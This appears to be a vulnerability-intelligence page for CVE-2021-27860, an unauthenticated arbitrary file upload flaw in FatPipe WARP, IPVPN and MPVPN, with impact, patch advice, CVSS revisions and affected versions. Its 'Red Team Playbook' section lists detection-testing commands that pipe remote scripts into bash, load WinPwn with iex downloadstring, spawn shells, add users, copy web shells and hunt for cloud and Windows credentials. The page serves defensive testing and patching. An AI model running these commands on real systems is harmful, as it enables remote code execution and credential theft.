CVE-2021-27860
Overview
The vulnerability is an unrestricted file upload flaw originating from improper input validation in the web management interface of FatPipe WARP, IPVPN, and MPVPN software. Specifically, the affected component fails to restrict file upload destinations, allowing arbitrary file writes to any location on the underlying filesystem. This issue is rooted in inadequate sanitization and access control checks within the web interface's file handling functionality prior to versions 10.1.2r60p92 and 10.2.2r44p1.
Vulnerability Description
A vulnerability in the web management interface of FatPipe WARP, IPVPN, and MPVPN software prior to versions 10.1.2r60p92 and 10.2.2r44p1 allows a remote, unauthenticated attacker to upload a file to any location on the filesystem. The FatPipe advisory identifier for this vulnerability is FPSA006.
Impact
An unauthenticated remote attacker can upload malicious files to arbitrary locations on the device filesystem, potentially leading to remote code execution, persistent backdoors, or system compromise. No prior credentials or user interaction are necessary, enabling full system control. This can result in unauthorized access to sensitive data, disruption of network services, and lateral movement within an enterprise environment relying on FatPipe products.
Solution
Apply the vendor-released patches for FatPipe WARP, IPVPN, and MPVPN software updating to versions 10.1.2r60p92 or later, or 10.2.2r44p1 or later as specified in advisory FPSA006. Detailed patch instructions and updates are available at https://www.fatpipeinc.com/support/cve-list.php. No official workarounds have been documented; immediate upgrade is recommended to remediate the vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical vulnerability exists within the web management interface of FatPipe's WARP, IPVPN, and MPVPN software, affecting multiple firmware versions. This flaw allows a remote, unauthenticated attacker to upload files to arbitrary locations on the filesystem. The underlying issue stems from inadequate input validation and improper access controls within the web management interface, which fails to authenticate users before permitting file uploads. As a result, attackers can exploit this weakness to place malicious files on the affected systems, potentially leading to further compromise.
The attack vector for this vulnerability is particularly concerning due to its remote exploitation capability. An attacker only needs to access the web management interface, which is often exposed to the internet, to initiate the attack. Once the attacker successfully uploads a malicious file, they can execute various actions, such as deploying web shells, exfiltrating sensitive data, or leveraging the compromised system as a foothold for lateral movement within the network. The ease of exploitation, combined with the lack of authentication requirements, makes this vulnerability a significant threat to organizations utilizing these FatPipe products.
The real-world impact of this vulnerability can be severe, particularly for businesses that rely on FatPipe's solutions for their network infrastructure. Successful exploitation can lead to unauthorized access to sensitive data, disruption of services, and potential financial losses due to operational downtime or data breaches. Furthermore, the reputational damage associated with a security incident can lead to a loss of customer trust and potential legal ramifications. Organizations may also face compliance issues if sensitive data is compromised, especially in regulated industries such as finance and healthcare.
To effectively detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating and patching affected firmware versions is paramount, as the vendor has released updates that address this vulnerability. Additionally, organizations should employ network segmentation to limit exposure of the web management interface to trusted networks only. Implementing web application firewalls (WAFs) can also help to filter and monitor HTTP requests, blocking malicious file upload attempts. Furthermore, organizations should conduct regular security assessments and penetration testing to identify and remediate vulnerabilities before they can be exploited by attackers.
In conclusion, the vulnerability within the web management interface of FatPipe's software presents a significant risk to organizations that utilize these products. The potential for remote exploitation without authentication, coupled with the severe implications of a successful attack, necessitates immediate attention from security teams. By adopting proactive detection and mitigation strategies, organizations can safeguard their networks against this and similar vulnerabilities, thereby enhancing their overall security posture.
The CVSS score for CVE-2021-27860 has been revised upward from 8.8 to 9.8, reflecting a reassessment of the vulnerability’s criticality. This adjustment underscores the heightened potential impact and exploitability of the remote, unauthenticated file upload flaw in FatPipe’s web management interface. Although our telemetry has not detected any new exploit techniques or active exploitation campaigns, the elevated score signals increased urgency for defenders to prioritize this vulnerability. The EPSS score remains stable at a high percentile, indicating persistent risk but no recent surge in exploitation attempts. This recalibration of severity amplifies the threat level, emphasizing that successful exploitation could lead to severe consequences, including full system compromise. Security teams should interpret this change as a validation of the vulnerability’s critical nature, warranting sustained vigilance despite the absence of fresh exploit intelligence.
Update 2 — July 12, 2026
Recent updates to the CVSS scoring for CVE-2021-27860 reflect a downward adjustment from 9.8 to 8.8, indicating a refined understanding of the vulnerability’s exploitability and impact. This recalibration stems from ongoing analysis and corroborated data from CSURFACE threat intelligence, which suggests that while the vulnerability remains highly critical, certain exploit conditions or impact factors may be less severe than initially assessed. The EPSS score remains stable within a high percentile, confirming persistent exploitation risk but without evidence of an accelerating trend or widespread active campaigns targeting this flaw. For defenders, this nuanced change underscores the importance of maintaining vigilance and prioritization of patching efforts, but it also signals that immediate crisis-level urgency may be somewhat moderated. The threat level remains elevated due to the vulnerability’s capacity for remote, unauthenticated file upload leading to potential full system compromise, yet the absence of new exploit developments or ransomware linkage tempers the immediacy of the threat. This update refines the risk landscape by balancing severity with current exploitation realities, guiding security teams to sustain robust defenses without overestimating imminent exploitation pressure.
Affected Products (108)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Fatpipeinc | Ipvpn Firmware | 5.2.0 |
cpe:2.3:o:fatpipeinc:ipvpn_firmware:5.2.0:r34:*:*:*:*:*:*
|
|
|
Fatpipeinc | Ipvpn Firmware | 6.1.2 |
cpe:2.3:o:fatpipeinc:ipvpn_firmware:6.1.2:r70p26:*:*:*:*:*:*
|
|
|
Fatpipeinc | Ipvpn Firmware | 6.1.2 |
cpe:2.3:o:fatpipeinc:ipvpn_firmware:6.1.2:r70p45-m:*:*:*:*:*:*
|
|
|
Fatpipeinc | Ipvpn Firmware | 6.1.2 |
cpe:2.3:o:fatpipeinc:ipvpn_firmware:6.1.2:r70p75-m:*:*:*:*:*:*
|
|
|
Fatpipeinc | Ipvpn Firmware | 7.1.2 |
cpe:2.3:o:fatpipeinc:ipvpn_firmware:7.1.2:r39:*:*:*:*:*:*
|
|
|
Fatpipeinc | Ipvpn Firmware | 9.1.2 |
cpe:2.3:o:fatpipeinc:ipvpn_firmware:9.1.2:r129:*:*:*:*:*:*
|
|
|
Fatpipeinc | Ipvpn Firmware | 9.1.2 |
cpe:2.3:o:fatpipeinc:ipvpn_firmware:9.1.2:r144:*:*:*:*:*:*
|
|
|
Fatpipeinc | Ipvpn Firmware | 9.1.2 |
cpe:2.3:o:fatpipeinc:ipvpn_firmware:9.1.2:r150:*:*:*:*:*:*
|
|
|
Fatpipeinc | Ipvpn Firmware | 9.1.2 |
cpe:2.3:o:fatpipeinc:ipvpn_firmware:9.1.2:r156:*:*:*:*:*:*
|
|
|
Fatpipeinc | Ipvpn Firmware | 9.1.2 |
cpe:2.3:o:fatpipeinc:ipvpn_firmware:9.1.2:r161p12:*:*:*:*:*:*
|
|
|
Fatpipeinc | Ipvpn Firmware | 9.1.2 |
cpe:2.3:o:fatpipeinc:ipvpn_firmware:9.1.2:r161p16:*:*:*:*:*:*
|
|
|
Fatpipeinc | Ipvpn Firmware | 9.1.2 |
cpe:2.3:o:fatpipeinc:ipvpn_firmware:9.1.2:r161p17:*:*:*:*:*:*
|
|
|
Fatpipeinc | Ipvpn Firmware | 9.1.2 |
cpe:2.3:o:fatpipeinc:ipvpn_firmware:9.1.2:r161p2:*:*:*:*:*:*
|
|
|
Fatpipeinc | Ipvpn Firmware | 9.1.2 |
cpe:2.3:o:fatpipeinc:ipvpn_firmware:9.1.2:r161p20:*:*:*:*:*:*
|
|
|
Fatpipeinc | Ipvpn Firmware | 9.1.2 |
cpe:2.3:o:fatpipeinc:ipvpn_firmware:9.1.2:r161p26:*:*:*:*:*:*
|
|
|
Fatpipeinc | Ipvpn Firmware | 9.1.2 |
cpe:2.3:o:fatpipeinc:ipvpn_firmware:9.1.2:r161p3:*:*:*:*:*:*
|
|
|
Fatpipeinc | Ipvpn Firmware | 9.1.2 |
cpe:2.3:o:fatpipeinc:ipvpn_firmware:9.1.2:r164:*:*:*:*:*:*
|
|
|
Fatpipeinc | Ipvpn Firmware | 9.1.2 |
cpe:2.3:o:fatpipeinc:ipvpn_firmware:9.1.2:r164p4:*:*:*:*:*:*
|
|
|
Fatpipeinc | Ipvpn Firmware | 9.1.2 |
cpe:2.3:o:fatpipeinc:ipvpn_firmware:9.1.2:r164p5:*:*:*:*:*:*
|
|
|
Fatpipeinc | Ipvpn Firmware | 9.1.2 |
cpe:2.3:o:fatpipeinc:ipvpn_firmware:9.1.2:r165:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
3 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-1 | Accessing Functionality Not Properly Constrained by ACLs |
30%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-27860 |
| fatpipeinc.com |
GitHub CVE
|
https://www.fatpipeinc.com/support/cve-list.php |
| ic3.gov |
GitHub CVE
|
https://www.ic3.gov/Media/News/2021/211117-2.pdf |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-27860 |